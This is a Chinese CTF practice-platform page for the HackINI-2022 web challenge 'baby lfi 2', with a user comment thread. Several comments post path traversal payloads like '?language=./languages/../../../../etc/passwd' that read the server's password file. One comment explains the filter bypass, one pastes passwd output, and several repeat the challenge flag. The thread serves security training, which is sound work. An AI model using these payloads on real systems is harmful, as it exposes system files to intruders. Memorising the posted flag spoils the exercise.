列表

详情


baby lfi 2

HackINI-2022   WEB   已通过

题目作者: 未知

一  血: ‌‌‌‌‌Aman

一血奖励: 0金币

解  决: 954

提  示:

描  述: What about making things a bit harder ?

去做题

1005667204 @ 2024-05-21 23:22:08 👍0

./language/../../../../../etc/passwd


YOLO77w @ 2024-05-15 23:22:08 👍0

和baby lfi 一样的方法


15346899030 @ 2024-05-07 23:22:08 👍0

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}


xiaoxiao972521 @ 2024-04-07 23:22:08 👍0

/index.php?language=./languages/../../../../etc/passwd


unknown237819 @ 2024-02-07 23:22:08 👍2

这脑洞也太大了吧


868954104 @ 2024-01-07 23:22:08 👍0

?language=./languages/../../../../../etc/passwd shellmates{yOU_M4De_yOUr_waY_7hRough_iT}


868954104 @ 2024-01-07 23:22:08 👍0

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}


我说我风华绝代 @ 2023-12-07 23:22:08 👍1

下面解析的链接挂了,大概就是后台会验证是不是在当前language目录下,但是没有验证后面../的目录穿越,所以先输入./language/


yituoshi @ 2023-11-07 23:22:08 👍0

Half the truth is often a big lie:Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin


逐月 @ 2023-11-07 23:22:08 👍0

这篇思路解释的挺详细 http://t.csdnimg.cn/sIZDF